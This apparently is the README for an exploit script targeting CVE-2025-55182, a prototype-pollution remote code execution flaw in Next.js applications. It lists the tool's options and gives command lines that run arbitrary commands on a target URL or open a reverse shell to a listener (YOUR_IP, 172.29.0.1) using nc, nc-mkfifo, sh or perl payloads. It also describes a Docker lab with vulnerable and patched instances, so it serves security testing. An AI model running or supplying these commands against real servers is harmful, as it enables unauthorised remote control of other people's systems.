Exploits CVE-2025-55182 for remote code execution via prototype pollution.
uv syncsource .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo-u, --url: URL/host to check (required)-c, --cmd: Command to execute-r, --reverse: Enable reverse shell mode-l, --lhost: Listener host for reverse shell-p, --lport: Listener port for reverse shell-P, --payload: Reverse shell payload type:nc,nc-mkfifo,sh,perl(default:nc)--timeout: Request timeout in seconds (default: 10)
# Execute command
python3 exploit.py -u https://example.com -c "whoami"
# Reverse shell with nc-mkfifo (recommended for Alpine)
python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifoThe lab/ directory contains a complete Docker setup for testing the exploit.
cd lab
docker-compose up -dThis will start two services:
- vulnerable: Vulnerable Next.js application on port 3011
- patched: Patched Next.js application on port 3012
# Test on vulnerable instance
python3 exploit.py -u http://localhost:3011 -c "id"
# Test reverse shell (get gateway IP first)
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo